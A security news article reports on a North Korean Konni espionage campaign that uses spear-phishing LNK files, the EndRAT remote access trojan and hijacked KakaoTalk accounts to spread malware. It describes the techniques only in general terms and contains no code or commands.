Cybersecurity researchers have identified a new cyber espionage campaign carried out by the North Korean threat group Konni. The attackers are using phishing emails to compromise victims and then leveraging the popular messaging platform KakaoTalk to distribute malware to additional targets.
The activity was analyzed by South Korean cybersecurity company Genians, whose researchers observed a multi stage attack designed to maintain long term access to infected systems while collecting sensitive information.
Phishing Email Used as Initial Attack Vector
According to analysts at the Genians Security Center (GSC), the attack begins with a carefully crafted spear phishing email.
The message is disguised as an official notice claiming the recipient has been appointed as a lecturer on North Korean human rights topics. The email encourages the recipient to open a ZIP attachment that supposedly contains related documents.
Inside the archive is a malicious Windows shortcut file (LNK). When the victim opens the file, it silently downloads additional malicious components from a remote server.
Malware Establishes Persistence and Hides Its Activity
Once executed, the malicious LNK file downloads the main payload and installs it on the victim’s system.
To ensure long term access, the malware creates scheduled tasks within the operating system that allow it to run automatically. At the same time, a legitimate looking PDF document is displayed to the user as a decoy to distract them from the malicious activity happening in the background.
EndRAT Gives Attackers Full Remote Access
The downloaded payload is a remote access trojan known as EndRAT, also called EndClient RAT.
The malware is written using the scripting language AutoIt and provides attackers with extensive control over the compromised computer. Its capabilities include:
- Remote command execution
- File browsing and management
- Data exfiltration
- Remote shell access
- Persistent system control
Through these functions, attackers can monitor victim activity and extract valuable internal documents.
Multiple RAT Families Deployed on High Value Targets
During forensic analysis, researchers also discovered additional malware components on infected systems.
These included AutoIt based scripts associated with RftRAT and the well known remote access malware Remcos RAT.
The presence of several RAT families suggests the attackers considered the compromised target highly valuable and deployed multiple tools to ensure continued access even if one malware strain was removed.
KakaoTalk Accounts Used to Spread Malware
One of the most notable aspects of this campaign is the use of the victim’s own messaging account to spread malware further.
After gaining control of the system, the attackers accessed the victim’s active KakaoTalk desktop application. They then sent malicious ZIP files to selected contacts from the victim’s friend list.
These files were disguised as documents related to North Korea topics to increase the likelihood that recipients would open them.
This tactic exploits the trust between contacts, making the attack more convincing and increasing the chances of successful infection.
Similar Tactics Observed in Earlier Campaign
Researchers previously documented similar behavior from the Konni group in November 2025.
In that campaign, attackers also used compromised KakaoTalk sessions to distribute malicious archives to contacts. At the same time, they remotely wiped victims’ Android devices using stolen Google account credentials.
Multi Stage Espionage Operation
Security experts believe the latest activity represents a sophisticated espionage campaign rather than a simple phishing attack.
The operation combines several techniques including targeted phishing, long term persistence, information theft, and social trust exploitation through messaging platforms.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
